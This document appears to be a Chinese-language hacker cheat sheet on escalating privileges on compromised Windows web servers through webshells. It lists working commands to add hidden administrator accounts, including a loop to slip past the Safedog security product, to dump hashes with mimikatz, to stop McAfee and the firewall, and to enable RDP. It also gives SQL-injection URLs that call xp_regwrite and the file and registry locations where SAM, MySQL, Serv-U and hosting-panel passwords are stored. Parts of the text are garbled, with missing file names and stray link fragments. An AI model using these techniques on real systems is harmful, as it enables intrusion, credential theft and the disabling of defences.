### 提权技巧
2 user不能执行有时候是被删除了,可以先试试net1,不行就自己上
传一个
C:\,命令那里清空(包括/c )输入net user jianmei daxia
/add
4.有时候因为监控而添加用户失败,试试上传抓取hash的工具,如,得到hash之后可以进行破解,建议重定向结果到保存为1.txt
cmd /c c:\windows\temp\ &,在条件允许的情况下
也可以用mimikatz直接抓明文
5.有时候权限很松,很多命令都可以执行,但是就是增加不上用户,这时候你就要考虑是不是因为密码过于简单或是过于复杂了
6.用wt.asp扫出来的目录,其中红的文件可以替换成exp,执行命令时cmd那里输
入替换的文件路径,下面清空双引号加增加用户的命令
7.有时候可以添加用户,但是添加不到管理组,有可能是administrators组改名
了,使用命令net user administrator查看管理组的名字
8.有的cmd执行很变态,asp马里,cmd路径填上面,下面填:"c:\ whoami” 记得前面加两个双引号,不行后面也两个,不行就把exp的路径放在cmd那里,下面不变
9.当添加不上用户却可以添加“增加用户的Vbs、bat)的时候,就添加一个吧,然后
用“直接使服务器蓝屏重启的东东”让服务器重启就提权成功
10.菜刀执行的技巧,上传cmd到可执行目录,右击cmd 虚拟终端,help 然后setp
c:\windows\ 设置终端路径为:c:\windows\
11.支持aspx但跨不了目录的时候,可以上传一个读iis的vbs,执行命令列出所有网站目录,到主站的目录就可以跨过去了,上传到可执行目录,
接着上传iispwd.vbs到网站根目录,cmd命令cmd /c
“c:\windows\temp\” d:\web\iispwd.vbs
11.如何辨别服务器是不是内网?
12.安全狗下加用户的语句::for /l %i in (1,1,1000) do @net user test
test [/add&@net]() localgroup administrators test /add
13.21对应的FTP、1433对应的MSSQL、3306对应的MYSQL、3389对应的远程桌面、1521对应的Oracle、5631对应的pcanywhere
14.劫持提权,说到这个,想必肯定会想到lpk.dll这类工具,有时候在蛋疼怎么都
加不上账户的时候,可以试试劫持shift、添加开机启动等等思路
15.提权成功但3389端口没开,执行语句或是工具开3389失败的时候,可以上传rootkit.asp,登陆进去就
是system权限,这时候再尝试开3389希望较大
### 常用DOS命令
查看版本:ver
tomcat虚拟主机怎么设置查看权限:whoami
查看配置:systeminfo
查看用户:net user
查看进程:tasklist
查看正在运行的服务:tasklist /svc
查看开放的所有端口:netstat -ano
查询管理用户名:query user
查看搭建环境:ftp 127.0.0.1
查看指定服务的路径:sc qc Mysql
添加一个用户:net user jianmei daxia.asd /add
提升到管理权限:net localgroup administrators jianmei /add
添加用户并提升权限:net user jianmei daxia.asd /add & net localgroup administrators jianmei /add
查看制定用户信息:net user jianmei
查看所有管理权限的用户:net localgroup administrators
加入远程桌面用户组:net localgroup “Remote Desktop Users” jianmei /add 突破最大连接数:mstsc /admin /v:127.0.0.1
删除用户:net user jianmei /del
删除管理员账户:net user administrator daxia.asd
更改系统登陆密码:net password daxia.asd
激活GUEST用户:net user guest /active:yes
开启TELNET服务:net start telnet
关闭麦咖啡:net stop “McAfee McShield”
关闭防火墙:net stop sharedaccess
查看当前目录的所有文件:dir c:\windows\
查看制定文件的内容:type c:\windows\1.asp
把复制到c:\windows的temp目录下并命名为:copy
c:\windows\temp\ c:\windows\
开3389端口的命令:REG ADD
HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
查看补丁:dir c:\windows\&&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log
KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log)
do @type [a.txt|@find](%7C@find) /i [“%i”||@echo] (mailto:%E2%80%9C%i%E2%80%9D%7C%7C@echo)%i Not Installed!)&del /f /q /
### 常见杀软
< 360实时保护
< 360主动防御
< 金山卫士
麦咖啡
< 服务器安全狗
### windows提权中敏感目录和敏感注册表的利用
敏感目录目录权限提权用途
C:\Program Files\默认用户组users对该目录拥有查看权可以查看服务器安装的应用软件
C:\Documents and Settings\All Users\「开始」菜单\程序 Everyone拥有查看权限存放快捷方式,可以下载文件,属性查看安装路径
C:\Documents and Settings\All Users\Documents Everyone完全控制权限上
传执行cmd及exp
C:\windows\system32\inetsrv\ Everyone完全控制权限上传执行cmd及exp
C:\windows\my.iniC:\Program Files\MySQL\MySQL Server 5.0\my.ini默认
用户组users拥有查看权限安装mysql时会将root密码写入该文件
C:\windows\system32\默认用户组users拥有查看权限 Shift后门一般在该文件夹,可以下载后门破解密码
C:\Documents and Settings\All Users\「开始」菜单\程序\启动 Everyone拥有
查看权限可以尝试向该目录写入vbs或bat,服务器重启后运行
C:\RECYCLER\D:\RECYCLER\ Everyone完全控制权限回收站目录。常用于执行cmd 及exp
C:\Program Files\Microsoft SQL Server\默认用户组users对该目录拥有查看
权限有时候该目录也存在可执行权限
C:\Program Files\MySQL\默认用户组users对该目录拥有查看权限到MYSQL目录中user.MYD里的root
C:\oraclexe\默认用户组users对该目录拥有查看权限可以尝试利用Oracle的默
认账户提权
C:\WINDOWS\system32\config默认用户组users对该目录拥有查看权限尝试下载sam文件进行破解提权
C:\Program Files\Geme6 FTP Server\Remote Admin\Remote.ini默认用户组users对该目录拥有查看权限 Remote.ini文件中存放着G6FTP的密码
c:\Program Files\RhinoSoft\Serv-U\c:\Program Files\Serv-U\默认用户组users对该目录拥有查看权限 ServUDaemon.ini 中存储了虚拟主机网
站路径和密码
c:\windows\system32\l默认用户组users对该目录拥有查看权限 IIS配置文件
C:tomcat5.0\f默认用户组users对该目录拥有查看权限 Tomat存放密码的位置
C:\ZKEYS\Setup.ini默认用户组users对该目录拥有查看权限 ZKEYS虚拟主机存放密码的位置
### 提权中的敏感注册表位置
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\MSSQLServer\SuperS ocketNetLib\Tcp Mssql端口
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server DenyTSConnections远程终端值为0 即为开启
HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\ mssql的注册表位置
HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\华众主机注册表配置位置
HKEY_LOCAL_MACHINE\SOFTWARE\Cat Soft\Serv-U\Domains\1\UserList\
serv-u的用户及密码(su加密)位置
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\ WinStations\RDP-Tcp
在该注册表位置PortNumber的值即位3389端口值
HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers mysql管理工具Navicat的注册表位置,提权运用请谷歌
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters Radmin的配置
文件,提权中常将其导出进行进行覆盖提权
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters \Virtual Roots\ IIS注册表全版本泄漏用户路径和FTP用户名漏洞
HKEY_LOCAL_MACHINE\software\hzhost\config\Settings\mastersvrpass华众主机在注册表中保存的mssql、mysql等密码
HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11星外主机mssql的sa账号密码,双MD5加密
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters \Virtual Roots\ControlSet002星外ftp的注册表位置,当然也包括
ControlSet001、ControlSet003
### SQL语句直接开启3389 3389登陆关键注册表位置:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\D enyTSConnections
其中键值DenyTSConnections直接控制着3389的开启和关闭,当该键值为0表示3389开启,1则表示关闭。
而MSSQL的xp_regwrite的存储过程可以对注册进行修改,我们使用这点就可以简单
的修改DenyTSConnections键值,从而控制3389的关闭和开启。
开启3389的SQL语句:syue/xiaohua.asp?id=100;exec
master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet \Control\TerminalServer’,'fDenyTSConnections’,'REG_DWORD’,0;–
关闭3389的SQL语句:syue/xiaohua.asp?id=100;exec
master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet \Control\TerminalServ
er’,'fDenyTSConnections’,'REG_DWORD’,1;–
2003可以实现一句话开3389:reg add
“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp” /v PortNumber /t REG_DWORD /d 80 /f
### wscript.shell的删除和恢复
发表评论